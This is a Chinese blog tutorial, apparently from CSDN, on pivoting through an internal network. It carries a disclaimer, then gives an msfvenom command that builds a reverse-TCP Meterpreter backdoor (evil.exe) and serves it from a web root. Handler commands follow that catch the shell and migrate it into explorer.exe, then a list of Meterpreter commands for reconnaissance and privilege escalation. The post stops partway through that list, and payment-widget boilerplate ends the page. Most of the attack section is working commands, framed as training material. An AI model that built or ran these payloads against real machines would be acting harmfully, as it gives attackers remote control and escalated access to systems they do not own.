内网安全之:内网渗透流程

本文详细介绍了内网渗透的流程,包括建立meterpreter反向连接,信息收集,添加持久后门,扫描内网主机和端口,以及利用SOCKS代理和MSF模块进行攻击。强调了实验环境的安全使用,并提醒读者不得用于非法活动。
摘要由CSDN通过智能技术生成

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

1 前提

利用已经控制的一台计算机作为入侵内网的跳板,在其他内网计算机看来访问全部来自于跳板机(WEB Server)

2 实验环境

image-20210907114012925

2.1 建立 meterpreter 反向连接

  1. 生成 Metaspolit 后门程序

    msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe
    
  2. kali 配置监听 meterpreter 反向连接,并自动将恶意软件的进程迁移至 explorer.exe

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.2
    set autorunscript migrate -n explorer.exe
    run
    
  3. WEB Server 下载 Metaspolit 后门程序,并打开程序

  4. meterpreter 反向连接建立成功

    image-20210907090333652

2.2 收集信息提升权限

ipconfig      Display interfaces
route         View and modify the routing table
getuid        Get the user that the server is running as 查看当前用户
getprivs      Attempt to enable all privileges available to the current process 尽可能提升权限
getsystem     Attempt to elevate your privilege to that of local system. 通过各种攻击向量来提升本地系统权限
ps            List running processes 列出进程
</
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值